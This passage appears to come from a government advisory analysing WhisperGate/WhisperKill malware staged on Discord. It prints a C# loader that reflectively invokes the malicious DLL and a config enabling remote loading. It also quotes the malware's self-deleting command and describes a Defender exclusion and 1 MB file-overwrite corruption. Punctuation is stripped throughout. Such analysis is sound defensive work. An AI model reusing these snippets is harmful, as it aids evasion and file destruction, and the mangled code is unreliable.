Reversing the bytes of Tbopbhjpg revealed the hashes of the resulting payload listed in Table 20 belowppThe original filename from the resulting payload was a Dynamic Link Library DLL file Frkmlkdkdubkznbkmcfdll its attributes are listed in Table 21ppu2005 u2005 u2009 u2008 u2001 u2007 u2009 u200b u200a u2005ppNote This format annotates action taken by EazFuscator to obfuscate items making it difficult for malware analysts to reviewppstage2exe was observed calling method Ylfwdwgmpilzyaph to begin decrypting resource 78c855a088924e92a7f60d661c3d1845 The reflection library was used to execute method Ylfwdwgmpilzyaph as shown in the following C code blockppusing SystemReflectionstring path Frkmlkdkdubkznbkmcfdllstring fqpn PathGetFullPathpathAssembly assembly AssemblyLoadFilefqpnType type assemblyGetTypeClassLibrary1MaintypeInvokeMemberYlfwdwgmpilzyaph BindingFlagsInvokeMethod null null nullppThe following application configuration accompanied the above code block to allow loading from remote sourcesppxml version10 encodingutf8 configurationruntimeloadFromRemoteSources enabledtrueruntimeconfigurationppUpon invoking the method Ylfwdwgmpilzyaph Nmddfrqqrbyjeygggdavbs wrote to the Windows TEMP directory and has the following attributes as listed in Table 22 belowppThe VBS code listed in Table 22 used a WScript shell that executed as a Windows application which ran a PowerShell command to exclude the C drive from Windows Defenders security checks Malware analysts decoded and decrypted one of the resources from Frkmlkdkdubkznbkmcfdll 78c855a088924e92a7f60d661c3d1845 Further analysis of Frkmlkdkdubkznbkmcfdll resulted in an additional DLL file with the following hashesppThis decrypted DLL file contained two resources AdvancedRun and WaqybgppTable 23 and Table 24 list the file properties for both the AdvancedRun and reversed Waqybg decompressed filesppThe reversed and decompressed Waqybg files contained file corruption logic along with a final command to ping arbitrarily and delete itself cmdexe min C ping 111111111111 n 5 w 10 Nul Del f q s Waqybg is known as WhisperKilla malware downloaded by WhisperGate that destroys files with specific extensions1921ppThe following file extensions listed in Table 25 were targeted for file corruption with the equivalent of the wcscmp C function logic a string compare function The corruption logic included overwriting 0x100000 or 1 MB worth of 0xcc values per targeted fileppstage2exe and its respective payload Tbopbhjpg served as a template for other malware within Discord Cluster 1 While most of these other malware files have not been observed in open source reporting malware analysts assess them as payloads that follow the unravelling process listed in Figure 1 belowppTable 26 below provides a list of MD5 hashes for files found within Discord Cluster 1 When reversed these files become DLL files which were structured similarly to FrkmlkdkdubkznbkmcfdllppNote Analysts identified the files below in Discord Cluster 1 the files are staged on the Cluster in reversed byte order Analysts reversed the file byte order for each file into their proper portable executable format eg Functional format The hashes in Table 26 represent both byte ordersppTable 27 lists observed IP addresses that were first observed as early as 2022 and have been historically linked to Unit 29155 infrastructure These IPs are considered historical infrastructure and should be investigated for associated abnormal or malicious activityppThreat actors can exploit jump hosts also known as jump servers or bastion hosts to gain unauthorized access or perform malicious activities within a protected network In this context the domains listed in Table 28 represent the tools used to establish functionality for creating a jump hostppThis product is provided subject to this Notification and this Privacy Use policyppWe recently updated our anonymous product survey wed welcome your feedbackp
